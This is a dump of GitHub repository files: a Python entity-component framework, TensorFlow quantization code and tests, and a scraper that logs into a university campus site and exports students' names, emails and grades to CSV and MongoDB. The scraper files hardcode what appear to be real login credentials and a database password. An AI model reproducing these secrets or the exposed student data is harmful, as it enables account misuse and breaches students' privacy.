"text": "'''\r\nCreated on 09/05/2012\r\n\r\n@author: adam\r\n'''\r\n\r\nimport weakref\r\n\r\nclass Entity( object ):\r\n entities = {}\r\n \r\n def __init__( self, name ):\r\n super( Entity, self ).__init__()\r\n\r\n self.name = name\r\n self.components = {}\r\n self.data = {}\r\n\r\n if name in Entity.entities:\r\n raise ValueError( \"Entity name must be unique\" )\r\n Entity.entities[ name ] = weakref.ref( self )\r\n\r\n def __del__( self ):\r\n del Entity.entities[ self.name ]\r\n\r\n @staticmethod\r\n def find_entity( name ):\r\n if name in Entity.entities:\r\n entity = Entity.entities[ name ]\r\n if entity == None:\r\n del Entity.entities[ name ]\r\n return None\r\n else:\r\n return entity()\r\n return None\r\n\r\n @staticmethod\r\n def update_entities():\r\n for entity in Entity.entities.values():\r\n if entity != None:\r\n entity().update()\r\n else:\r\n del Entity.entities[ name ]\r\n\r\n def add_component( self, component ):\r\n if component.type in self.components:\r\n raise ValueError(\r\n \"Component type already registered\"\r\n )\r\n else:\r\n component._set_entity( self )\r\n self.components[ component.type ] = component\r\n\r\n def remove_component( self, type ):\r\n component = self.components[ type ]\r\n component._set_entity( None )\r\n del self.components[ type ]\r\n\r\n def find_component( self, type ):\r\n if type in self.components:\r\n return self.components[ type ]\r\n else:\r\n return None\r\n\r\n def update( self ):\r\n for component in self.components.values():\r\n component.update()\r\n\r\n"
},
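The Entity class above keeps its class-level registry as `weakref.ref` objects, so the registry alone never keeps an entity alive; a stored ref is itself never None, only its dereference is, which is the distinction behind the checks in `find_entity`/`update_entities`. A standalone sketch of the idiom (the `Thing` class is hypothetical; the immediate collection after `del` assumes CPython's reference counting):
```python
import weakref

class Thing(object):
    registry = {}

    def __init__(self, name):
        self.name = name
        # store a weak reference so the registry alone never keeps a Thing alive
        Thing.registry[name] = weakref.ref(self)

t = Thing("ball")
ref = Thing.registry["ball"]
print(ref() is t)     # True: dereferencing the weakref yields the live object
del t                 # drop the last strong reference
print(ref() is None)  # True under CPython: the weakref now dereferences to None
```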
{
"alpha_fraction": 0.47138965129852295,
"alphanum_fraction": 0.4931880235671997,
"avg_line_length": 15.380952835083008,
"blob_id": "33504cf82c43b6efc90f5b9de39bcdab725cd1a9",
"content_id": "a51d5a0eef2d79e79f8bd5e49fd36dd349b12e1b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 367,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 21,
"path": "/compy/component.py",
"repo_name": "adamlwgriffiths/ComPy",
"src_encoding": "UTF-8",
"text": "'''\r\nCreated on 09/05/2012\r\n\r\n@author: adam\r\n'''\r\n\r\n\r\nclass Component( object ):\r\n \r\n def __init__( self, type, name ):\r\n super( Component, self ).__init__()\r\n\r\n self.type = type\r\n self.name = name\r\n self.entity = None\r\n\r\n def _set_entity( self, entity ):\r\n self.entity = entity\r\n\r\n def update( self ):\r\n pass\r\n\r\n"
}
] | 6 |
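Taken together, the ComPy records above form a small entity-component framework: components attach to a uniquely named entity, share state through its `data` dict, and `Entity.update_entities()` drives every component's `update()`. A minimal hypothetical usage sketch (the `SpinComponent` class is invented for illustration; it assumes the `compy` package from this repo is importable):
```python
from compy.entity import Entity
from compy.component import Component

class SpinComponent(Component):
    type = "spin"

    def __init__(self, name):
        super(SpinComponent, self).__init__(SpinComponent.type, name)

    def update(self):
        # accumulate state on the owning entity's shared data dict
        self.entity.data["angle"] = self.entity.data.get("angle", 0.0) + 1.0

wheel = Entity("wheel")
wheel.add_component(SpinComponent("spin"))
Entity.update_entities()
print(Entity.find_entity("wheel").data["angle"])  # 1.0 after one update tick
```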
akarmi/model-optimization
|
https://github.com/akarmi/model-optimization
|
2a53655e92cabe5b180a0319bc64c339494b97bb
|
2d3faaa361ecb3639f4a29da56e0e6ed52336318
|
b9ed14f23d7d48ce88a93a808556cab9a0abc682
|
refs/heads/master
| 2020-08-16T17:20:55.836218 | 2019-10-07T17:49:50 | 2019-10-07T17:50:12 | 215,530,733 | 0 | 0 |
Apache-2.0
| 2019-10-16T11:23:40 | 2019-10-16T11:20:48 | 2019-10-15T21:20:12 | null |
[
{
"alpha_fraction": 0.6786585450172424,
"alphanum_fraction": 0.6829268336296082,
"avg_line_length": 36.701148986816406,
"blob_id": "d196d17c1a6950c0cf78f140ab70831b47bf1269",
"content_id": "cd79b497bd839182df8cb6d949ade95dbaa5639c",
"detected_licenses": [
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3280,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 87,
"path": "/tensorflow_model_optimization/python/core/quantization/keras/quantize_emulate.py",
"repo_name": "akarmi/model-optimization",
"src_encoding": "UTF-8",
"text": "# Copyright 2018 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"Entry point for quantize emulation during training of models.\"\"\"\n\nfrom tensorflow.python import keras\n\nfrom tensorflow_model_optimization.python.core.quantization.keras import quantize_annotate as quant_annotate\nfrom tensorflow_model_optimization.python.core.quantization.keras import quantize_aware_activation\nfrom tensorflow_model_optimization.python.core.quantization.keras.quantize_emulate_wrapper import QuantizeEmulateWrapper\n\n\ndef QuantizeEmulate(to_quantize,\n num_bits,\n narrow_range=True,\n symmetric=True,\n **kwargs):\n \"\"\"Use this function to emulate quantization on NN layers during training.\n\n The function accepts a single layer or multiple layers and handles them\n appropriately.\n\n Arguments:\n to_quantize: A single keras layer, list of keras layers, or a\n `tf.keras.Sequential` model.\n num_bits: Number of bits for quantization\n narrow_range: Whether to use the narrow quantization range [1; 2^num_bits\n - 1] or wide range [0; 2^num_bits - 1].\n symmetric: If true, use symmetric quantization limits instead of training\n the minimum and maximum of each quantization range separately.\n **kwargs: Additional keyword arguments.\n\n Returns:\n Wrapped layer with quantization applied.\n \"\"\"\n\n def _QuantizeList(layers, **params):\n \"\"\"Apply QuantizeEmulate wrapper to a list of layers.\n\n Args:\n layers: List of keras layers to apply QuantizeEmulate.\n **params: QuantizationParams for the entire list.\n\n Returns:\n List of layers wrapped with QuantizeEmulate.\n \"\"\"\n wrapped_layers = []\n\n for layer in layers:\n # Already quantized. Simply use and return. This supports usage such as\n # model = QuantizeEmulate([\n # Dense(),\n # QuantizeEmulate(Dense(), layer_params)\n # Dense()\n # ], model_params)\n if isinstance(layer, QuantizeEmulateWrapper):\n wrapped_layers.append(layer)\n continue\n\n wrapped_layers.append(QuantizeEmulate(layer, **params))\n\n return wrapped_layers\n\n params = {\n 'num_bits': num_bits,\n 'narrow_range': narrow_range,\n 'symmetric': symmetric\n }\n params.update(kwargs)\n\n if isinstance(to_quantize, list):\n return _QuantizeList(to_quantize, **params)\n elif isinstance(to_quantize, keras.Sequential):\n return keras.models.Sequential(_QuantizeList(to_quantize.layers, **params))\n elif isinstance(to_quantize, keras.layers.Layer):\n return QuantizeEmulateWrapper(to_quantize, **params)\n"
},
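For context, a hypothetical usage sketch of the `QuantizeEmulate` entry point defined above, mirroring its docstring and the adjacent test file: it accepts a single layer, a list of layers, or a `keras.Sequential` model, and wraps each layer in a `QuantizeEmulateWrapper`.
```python
from tensorflow.python import keras
from tensorflow_model_optimization.python.core.quantization.keras import quantize_emulate

QuantizeEmulate = quantize_emulate.QuantizeEmulate

# wrap a whole Sequential model; each layer ends up in a QuantizeEmulateWrapper
model = QuantizeEmulate(
    keras.Sequential([
        keras.layers.Conv2D(32, 4, input_shape=(28, 28, 1)),
        keras.layers.Dense(10),
    ]),
    num_bits=8,      # quantization bit width
    symmetric=True,  # train one symmetric range instead of separate min/max
)
```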
{
"alpha_fraction": 0.6698536276817322,
"alphanum_fraction": 0.683896005153656,
"avg_line_length": 36.18888854980469,
"blob_id": "459e6f5e75f4d9dcde5864f61800624e80f40027",
"content_id": "6f5f91ea4d7f952eb905c720e0f6247e429f72af",
"detected_licenses": [
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6694,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 180,
"path": "/tensorflow_model_optimization/python/core/quantization/keras/layers/conv_batchnorm_test.py",
"repo_name": "akarmi/model-optimization",
"src_encoding": "UTF-8",
"text": "# Copyright 2019 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"ConvBatchNorm layer tests.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tempfile\n\nimport numpy as np\nfrom six.moves import range\nimport tensorflow.compat.v1 as tf\n\nfrom tensorflow.python import keras\nfrom tensorflow.python.keras import activations\nfrom tensorflow.python.platform import test\nfrom tensorflow_model_optimization.python.core.quantization.keras import quantize\nfrom tensorflow_model_optimization.python.core.quantization.keras import utils\nfrom tensorflow_model_optimization.python.core.quantization.keras.layers import conv_batchnorm\n\n_ConvBatchNorm2D = conv_batchnorm._ConvBatchNorm2D\n\n\nclass ConvBatchNorm2DTest(test.TestCase):\n\n def setUp(self):\n super(ConvBatchNorm2DTest, self).setUp()\n self.batch_size = 8\n self.model_params = {\n 'filters': 2,\n 'kernel_size': (3, 3),\n 'input_shape': (10, 10, 3),\n 'batch_size': self.batch_size,\n }\n\n def _get_folded_batchnorm_model(self,\n is_quantized=False,\n post_bn_activation=None):\n return tf.keras.Sequential([\n _ConvBatchNorm2D(\n kernel_initializer=keras.initializers.glorot_uniform(seed=0),\n is_quantized=is_quantized,\n post_activation=post_bn_activation,\n **self.model_params)\n ])\n\n @staticmethod\n def _compute_quantization_params(model):\n # TODO(alanchiao): remove this once the converter for training-time\n # quantization supports producing a TFLite model with a float output.\n #\n # Derived from Nudge function in\n # tensorflow/core/kernels/fake_quant_ops_functor.h.\n min_val = keras.backend.eval(\n model.layers[0].post_activation._min_post_activation)\n max_val = keras.backend.eval(\n model.layers[0].post_activation._max_post_activation)\n quant_min_float = 0\n quant_max_float = 255\n\n scale = (max_val - min_val) / (quant_max_float - quant_min_float)\n zero_point = round(quant_min_float - min_val / scale)\n\n return scale, zero_point\n\n def _test_equivalent_to_tflite(self, model, is_tflite_quantized=False):\n _, keras_file = tempfile.mkstemp('.h5')\n _, tflite_file = tempfile.mkstemp('.tflite')\n\n model.compile(\n loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy'])\n\n model.fit(\n np.random.uniform(0, 1, size=[self.batch_size, 10, 10, 3]),\n np.random.uniform(0, 10, size=[self.batch_size, 8, 8, 2]),\n epochs=1,\n callbacks=[])\n\n # Prepare for inference.\n inp = np.random.uniform(0, 1, size=[self.batch_size, 10, 10, 3])\n inp = inp.astype(np.float32)\n\n # TensorFlow inference.\n tf_out = model.predict(inp)\n\n if is_tflite_quantized:\n scale, zero_point = self._compute_quantization_params(model)\n\n # TFLite input needs to be quantized.\n inp = inp * 255\n inp = inp.astype(np.uint8)\n\n # TensorFlow Lite inference.\n tf.keras.models.save_model(model, keras_file)\n with 
quantize.quantize_scope():\n utils.convert_keras_to_tflite(\n keras_file,\n tflite_file,\n custom_objects={'_ConvBatchNorm2D': _ConvBatchNorm2D},\n is_quantized=is_tflite_quantized)\n\n interpreter = tf.lite.Interpreter(model_path=tflite_file)\n interpreter.allocate_tensors()\n input_index = interpreter.get_input_details()[0]['index']\n output_index = interpreter.get_output_details()[0]['index']\n\n interpreter.set_tensor(input_index, inp)\n interpreter.invoke()\n tflite_out = interpreter.get_tensor(output_index)\n\n if is_tflite_quantized:\n # dequantize outputs\n tflite_out = [scale * (x - zero_point) for x in tflite_out]\n # Off by 1 in quantized output. Notably we cannot reduce this. There is\n # an existing mismatch between TensorFlow and TFLite (from\n # contrib.quantize days).\n self.assertAllClose(tf_out, tflite_out, atol=scale)\n else:\n # Taken from testFoldFusedBatchNorms from\n # https://github.com/tensorflow/tensorflow/blob/master/tensorflow/python/tools/optimize_for_inference_test.py#L230\n self.assertAllClose(tf_out, tflite_out, rtol=1e-04, atol=1e-06)\n\n def testEquivalentToNonFoldedBatchNorm(self):\n folded_model = self._get_folded_batchnorm_model(is_quantized=False)\n\n non_folded_model = tf.keras.Sequential([\n keras.layers.Conv2D(\n kernel_initializer=keras.initializers.glorot_uniform(seed=0),\n use_bias=False,\n **self.model_params),\n keras.layers.BatchNormalization(axis=-1),\n ])\n\n for _ in range(2):\n inp = np.random.uniform(0, 10, size=[1, 10, 10, 3])\n folded_out = folded_model.predict(inp)\n non_folded_out = non_folded_model.predict(inp)\n\n # Taken from testFoldFusedBatchNorms from\n # https://github.com/tensorflow/tensorflow/blob/master/tensorflow/python/tools/optimize_for_inference_test.py#L230\n self.assertAllClose(folded_out, non_folded_out, rtol=1e-04, atol=1e-06)\n\n def testEquivalentToFloatTFLite(self):\n model = self._get_folded_batchnorm_model(is_quantized=False)\n self._test_equivalent_to_tflite(model)\n\n def testQuantizedEquivalentToFloatTFLite(self):\n model = self._get_folded_batchnorm_model(is_quantized=True)\n self._test_equivalent_to_tflite(model)\n\n def testQuantizedWithReLUEquivalentToFloatTFLite(self):\n model = self._get_folded_batchnorm_model(\n is_quantized=True, post_bn_activation=activations.get('relu'))\n self._test_equivalent_to_tflite(model)\n\n def testQuantizedWithSoftmaxEquivalentToFloatTfLite(self):\n model = self._get_folded_batchnorm_model(\n is_quantized=True, post_bn_activation=activations.get('softmax'))\n self._test_equivalent_to_tflite(model)\n\n def testQuantizedEquivalentToQuantizedTFLite(self):\n model = self._get_folded_batchnorm_model(is_quantized=True)\n self._test_equivalent_to_tflite(model, is_tflite_quantized=True)\n\n\nif __name__ == '__main__':\n test.main()\n"
},
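The `_compute_quantization_params` helper in the test above reduces to a few lines of affine-quantization arithmetic: derive a (scale, zero_point) pair from an observed float range, then dequantize interpreter outputs with it. A minimal standalone sketch (the example min/max values are made up):
```python
def quant_params(min_val, max_val, quant_min=0.0, quant_max=255.0):
    # same arithmetic as _compute_quantization_params above: derive an affine
    # (scale, zero_point) pair from an observed float activation range
    scale = (max_val - min_val) / (quant_max - quant_min)
    zero_point = round(quant_min - min_val / scale)
    return scale, zero_point

scale, zp = quant_params(-1.0, 1.0)   # made-up range for illustration
x_q = 200                             # a uint8 value from the TFLite interpreter
x = scale * (x_q - zp)                # dequantize, as the test does for tflite_out
print(scale, zp, x)                   # ~0.00784, 128, ~0.565
```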
{
"alpha_fraction": 0.7036872506141663,
"alphanum_fraction": 0.7143491506576538,
"avg_line_length": 34.730159759521484,
"blob_id": "185600e3b7b97f53f6e17a9cac9f4e340b3bf9e0",
"content_id": "4c6af4917f8ffbcbb159060d69129e51a31e9c8a",
"detected_licenses": [
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2251,
"license_type": "permissive",
"max_line_length": 97,
"num_lines": 63,
"path": "/tensorflow_model_optimization/python/core/quantization/keras/quantize_emulate_test.py",
"repo_name": "akarmi/model-optimization",
"src_encoding": "UTF-8",
"text": "# Copyright 2019 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"Tests for quantize API functions.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\n\nfrom tensorflow.python import keras\nfrom tensorflow.python.platform import test\nfrom tensorflow_model_optimization.python.core.quantization.keras import quantize_emulate\nfrom tensorflow_model_optimization.python.core.quantization.keras import quantize_emulate_wrapper\n\nQuantizeEmulate = quantize_emulate.QuantizeEmulate\nQuantizeEmulateWrapper = quantize_emulate_wrapper.QuantizeEmulateWrapper\n\n\nclass QuantizeEmulateTest(test.TestCase):\n\n def setUp(self):\n self.conv_layer = keras.layers.Conv2D(32, 4, input_shape=(28, 28, 1))\n self.dense_layer = keras.layers.Dense(10)\n self.params = {'num_bits': 8}\n\n def _assert_quant_model(self, model_layers):\n self.assertIsInstance(model_layers[0], QuantizeEmulateWrapper)\n self.assertIsInstance(model_layers[1], QuantizeEmulateWrapper)\n\n self.assertEqual(model_layers[0].layer, self.conv_layer)\n self.assertEqual(model_layers[1].layer, self.dense_layer)\n\n def testQuantizeEmulateSequential(self):\n model = keras.models.Sequential([\n self.conv_layer,\n self.dense_layer\n ])\n\n quant_model = QuantizeEmulate(model, **self.params)\n\n self._assert_quant_model(quant_model.layers)\n\n def testQuantizeEmulateList(self):\n quant_layers = QuantizeEmulate([self.conv_layer, self.dense_layer],\n **self.params)\n\n self._assert_quant_model(quant_layers)\n\n\nif __name__ == '__main__':\n test.main()\n"
}
] | 3 |
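
The quantized branch of the batch-norm folding test above dequantizes the TFLite interpreter outputs with `scale * (x - zero_point)` before comparing them to the TensorFlow result. For reference, here is the same affine mapping in isolation; a minimal NumPy-only sketch in which the `scale` and `zero_point` values are illustrative, not taken from any real model:

```python
import numpy as np

# Illustrative quantization parameters (not from a real model).
scale, zero_point = 0.125, 3

# int8 values as a TFLite interpreter might return them.
quantized = np.array([3, 11, 19], dtype=np.int8)

# Affine dequantization: real_value = scale * (quantized - zero_point).
dequantized = scale * (quantized.astype(np.float32) - zero_point)
print(dequantized)  # -> [0. 1. 2.]
```

The `atol=scale` tolerance used in the test follows directly from this mapping: one quantization step corresponds to exactly `scale` in real-valued units.
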
RishavPathak/Leethcode
|
https://github.com/RishavPathak/Leethcode
|
84a826744067c97d382ddab89c2a1c1fb59bc6a8
|
397e93c71d1bdead8355226bd13a5f249955eeab
|
6e545269c1ec576e9c800b8d4a7de9bfee7ff8cc
|
refs/heads/master
| 2020-07-17T02:04:15.368743 | 2019-09-02T20:45:06 | 2019-09-02T20:45:06 | 205,918,325 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6938775777816772,
"alphanum_fraction": 0.7074829936027527,
"avg_line_length": 34.75,
"blob_id": "473e797c5e8e6678148cb4b1b89f1f7b9b157346",
"content_id": "3394019d99fdd4f4705c8b1e669e977439f33f0b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 147,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 4,
"path": "/Replace.py",
"repo_name": "RishavPathak/Leethcode",
"src_encoding": "UTF-8",
"text": "String=input(\"Enter a String : \")\r\nSub_String=input(\"Replace: \")\r\nSub_String1=input(\"Replaced with : \")\r\ns=String.replace(Sub_String,Sub_String1)\r\n"
}
] | 1 |
diegolanu89/ParserNotas
|
https://github.com/diegolanu89/ParserNotas
|
9cdd8f39de1f127e90441307c6583a2a2038c225
|
72d6623d1714e534071c4a809cba38051b3f9a09
|
0495446c96846f72e95bcbbb23b367983f41308d
|
refs/heads/master
| 2020-03-18T13:03:55.666390 | 2018-08-17T19:54:13 | 2018-08-17T19:54:13 | 134,757,247 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6666666865348816,
"alphanum_fraction": 0.7200000286102295,
"avg_line_length": 17.75,
"blob_id": "a3bc702b013ade18919a4fcbdb6e10b0e7963ebd",
"content_id": "0dc75bab044911aeefb57ce6ccae2c87de1f9a50",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 150,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 8,
"path": "/Parser/main.py",
"repo_name": "diegolanu89/ParserNotas",
"src_encoding": "UTF-8",
"text": "from Parser.parserNotas import Person\n\n\n\npeople1 = Person(\"male\",\"Jose Manuel\")\npeople2 = Person (\"female\", \"Ana\")\npeople1.display(33)\npeople2.display(22)\n"
},
{
"alpha_fraction": 0.6671408414840698,
"alphanum_fraction": 0.6955903172492981,
"avg_line_length": 24.545454025268555,
"blob_id": "78b67b649d697a25a2b30549abecad44b4e5a9b4",
"content_id": "48deec6879ea850205395a3289b0e9cf0b7d88f9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1406,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 55,
"path": "/samples/parserNotas.py",
"repo_name": "diegolanu89/ParserNotas",
"src_encoding": "UTF-8",
"text": "from requests import session\nfrom bs4 import BeautifulSoup\nimport os, sys, itertools, re\nimport urllib\nimport lxml\nimport configparser\nimport datetime\nimport pandas as pd\nimport tensorflow as tf\n\nbaseurl = 'http://campus.fi.uba.ar/'\n\nauthdata = {\n 'action': 'login',\n 'username': '34417934',\n 'password': 'Orobasotawas89'\n }\nwith session() as ses:\n r = ses.post(baseurl + 'login/index.php', data=authdata)\nr = ses.get('http://campus.fi.uba.ar/grade/report/grader/index.php?id=382')\n\nsoup = BeautifulSoup(r.text,'html.parser')\ntable= soup.find('table',{'class':'gradereport-grader-table'})\n\ntable_body = table.find('tbody')\nrows = table.find_all('tr')\ndata = []\n\nfor row in rows:\n cols = row.find_all(['th','td'])\n cols = [ele.text.strip() for ele in cols]\n data.append([ele for ele in cols if ele]) \n\nalumnos = pd.DataFrame(data=data)\n\nprint (alumnos)\n#Solo parcial A\nalumnos = alumnos[alumnos.columns[0:3]]\n\nnotasA = alumnos[alumnos.columns[2]]\nfiltroNotasA = notasA.iloc[3:63]\n\nalumnosfiltro = alumnos.iloc[3:63, 0:3]\nalumnosfiltro.columns=['Nombre','Email','NotaParcialA']\n\nprint (alumnosfiltro)\nprint (filtroNotasA)\n\nfiltroNotasA.to_csv('NotaS.CSV')\n#print (alumnos[alumnos[2]=='I'])\n\nnumpyMatrix = filtroNotasA.as_matrix()\n\ndataVar_tensor = tf.constant(numpyMatrix, dtype = tf.float32, shape=[15780,9])\ndepth_tensor = tf.constant(depth, 'float32',shape=[15780,1])\n\n"
},
{
"alpha_fraction": 0.5888888835906982,
"alphanum_fraction": 0.5962963104248047,
"avg_line_length": 19.769229888916016,
"blob_id": "b761fdd041d4ab83ceea28d26c63b00a89a94110",
"content_id": "c7bc6d4ba8121958bee3b29d34ad94c00aff47ab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 270,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 13,
"path": "/setup.py",
"repo_name": "diegolanu89/ParserNotas",
"src_encoding": "UTF-8",
"text": "from distutils.core import setup\n\nsetup(name='Parser_Notas',\n version='1.0',\n description='Parser de Notas del Campus',\n author='Diego Peyrano',\n author_email='[email protected]',\n license='free',\n packages=['Parser'],\n scripts=[\n 'bin/ejecutar.py',\n ],\n )\n"
},
{
"alpha_fraction": 0.5759360790252686,
"alphanum_fraction": 0.5881363153457642,
"avg_line_length": 31.561643600463867,
"blob_id": "ebfa494d502d444c2d82462d8ac361081ddb2c2d",
"content_id": "3bc2fe791a15e26d05ec6c6e6544838b7087a92d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2377,
"license_type": "no_license",
"max_line_length": 153,
"num_lines": 73,
"path": "/Parser/parserNotas.py",
"repo_name": "diegolanu89/ParserNotas",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom requests import session\nfrom bs4 import BeautifulSoup\nimport pandas as pd\n\nclass ParserNotas:\n\n username = ''\n password = ''\n baseweb = ''\n direccion = './CSV/out.csv'\n\n def iniciar_Sesion( self, user, passw, base):\n self.username = user\n self.password = passw\n self.baseweb = base\n\n def get_base( self ):\n return self.baseweb\n\n def parsear( self,online ):\n baseurl = self.baseweb\n #'http://campus.fi.uba.ar/'\n authdata = {\n 'action': 'login',\n 'username': self.username,\n 'password': self.password\n }\n\n with session() as ses:\n r = ses.post(baseurl + 'login/index.php', data=authdata)\n r = ses.get(online)\n #'http://campus.fi.uba.ar/grade/report/grader/index.php?id=382'\n return (r)\n\n def get_usuario( self ):\n return self.username\n\n def get_table (self, r):\n soup = BeautifulSoup(r.text,'html.parser')\n table= soup.find('table',{'class':'gradereport-grader-table'})\n table_body = table.find('tbody')\n rows = table.find_all('tr')\n data = []\n for row in rows:\n cols = row.find_all(['th','td'])\n cols = [ele.text.strip() for ele in cols]\n data.append([ele for ele in cols if ele])\n alumnos = pd.DataFrame(data=data)\n return ( pd.DataFrame(data=data) )\n\n def get_Notas(self, table):\n alumnos = table[table.columns[0:10]]\n alumnos.dropna()\n alumnosfiltro = alumnos.iloc[4:62, 0:10]\n alumnosfiltro.columns=['Nombre','Email','Parcial1','Parcial2','Parcial3','RecParcial1','RecParcial2','RecParcial3','2RecParcial1','2RecParcial2']\n alumnosfiltro = alumnosfiltro[alumnosfiltro.Parcial1 != '-']\n #alumnosfiltro = alumnosfiltro[alumnosfiltro.Parcial1B != '-']\n #alumnosfiltro = alumnosfiltro[alumnosfiltro.Parcial2 != '-']\n #alumnosfiltro = alumnosfiltro[alumnosfiltro.Rec1 != '-']\n self.get_csv(alumnosfiltro)\n return (alumnosfiltro)\n\n def get_csv(self, dataF):\n dataF.to_csv(self.direccion, index=False, header=True, sep=',', decimal=',', encoding = 'utf-8')\n\n def get_nombre_csv(self):\n return self.direccion\n\n def set_dir_csv(self, nueva):\n self.direccion=nueva\n"
},
{
"alpha_fraction": 0.550599217414856,
"alphanum_fraction": 0.5519307851791382,
"avg_line_length": 31.521739959716797,
"blob_id": "f558192e92b60e3a272768fa8969e6ea218158ff",
"content_id": "3f005c4193aa803348c4d66c4d0fe9045f3a0999",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1502,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 46,
"path": "/build/lib/Parser/atlas.py",
"repo_name": "diegolanu89/ParserNotas",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n#write the .csv file in mongoAtlas database\n# -*- coding: utf-8 -*-\nimport csv\nimport pandas as pd\nfrom pymongo import MongoClient\n\n#Importar y exportar datos desde el punto de vista del servidor\n\nclass Atlas:\n def __init__(self, server):\n self.client = MongoClient(server)\n\n def importar(self, archivo):\n db = self.client.coreTec\n db.coreTest.delete_many({})\n with open (archivo) as File:\n reader = csv.DictReader(File)\n header = [\"Email\", \"ParcialA\", \"ParcialB\"]\n for each in reader:\n row={}\n for field in header:\n row[field] = each[field]\n print(row)\n db.coreTest.insert_one(row)\n\n def exportar(self):\n db = self.client.coreTec\n elements = db.coreTest.find().count()\n fivestarcount = db.coreTest.find()\n each = (list(fivestarcount))\n Email = list()\n ParcialA = list()\n ParcialB = list()\n header = [\"Email\", \"ParcialA\", \"ParcialB\"]\n\n for k in range(1, elements):\n row = {}\n for field in header:\n row[field] = each[k][field]\n Email.append(row[\"Email\"])\n ParcialA.append(row[\"ParcialA\"])\n ParcialB.append(row[\"ParcialB\"])\n df = pd.DataFrame(data={\"Email\":Email,\"ParcialA\":ParcialA,\"ParcialB\":ParcialB})\n df.to_csv(\"./CSV/in.csv\", sep=',', index=False)\n self.client.close\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.6747868657112122,
"alphanum_fraction": 0.6820949912071228,
"avg_line_length": 25.483871459960938,
"blob_id": "6afcbdfc14c7f8f1411af8e2074b3bb55236b6d6",
"content_id": "2f4411ec759a3a0d101b2169859406d7955c8d76",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 821,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 31,
"path": "/bin/ejecutar.py",
"repo_name": "diegolanu89/ParserNotas",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport getpass\nfrom Parser.parserNotas import ParserNotas\nfrom Parser.atlas import Atlas\n\nparser = ParserNotas()\natlas = Atlas('mongodb+srv://diegolanus:[email protected]/test?retryWrites=true')\n\nusuario = input(\"Usuario:\")\npassword = getpass.getpass(\"Password:\")\n\nparser.iniciar_Sesion( usuario, password, 'http://campus.fi.uba.ar/')\nelementoParser = parser.parsear('http://campus.fi.uba.ar/grade/report/grader/index.php?id=382')\ntabla = parser.get_table(elementoParser)\n\nprint (parser.get_Notas(tabla))\natlas.importar(parser.get_nombre_csv())\natlas.exportar()\n\n\n\n# En Caso de usar parametros #\n#if len(sys.argv) == 2:\n #comando = sys.argv[1]\n #print (\"Comando:\", comando)\n\n #if comando == \"-a\":\n #print (parser.get_NotasA(tabla))\n #if comando == \"-b\":\n"
},
{
"alpha_fraction": 0.7120921015739441,
"alphanum_fraction": 0.7140114903450012,
"avg_line_length": 21.69565200805664,
"blob_id": "92a9e2914fd0c0148a57c8af4a4bacfc3f939547",
"content_id": "52107eea60b8c96bceec582e309a6ab76da6f778",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 521,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 23,
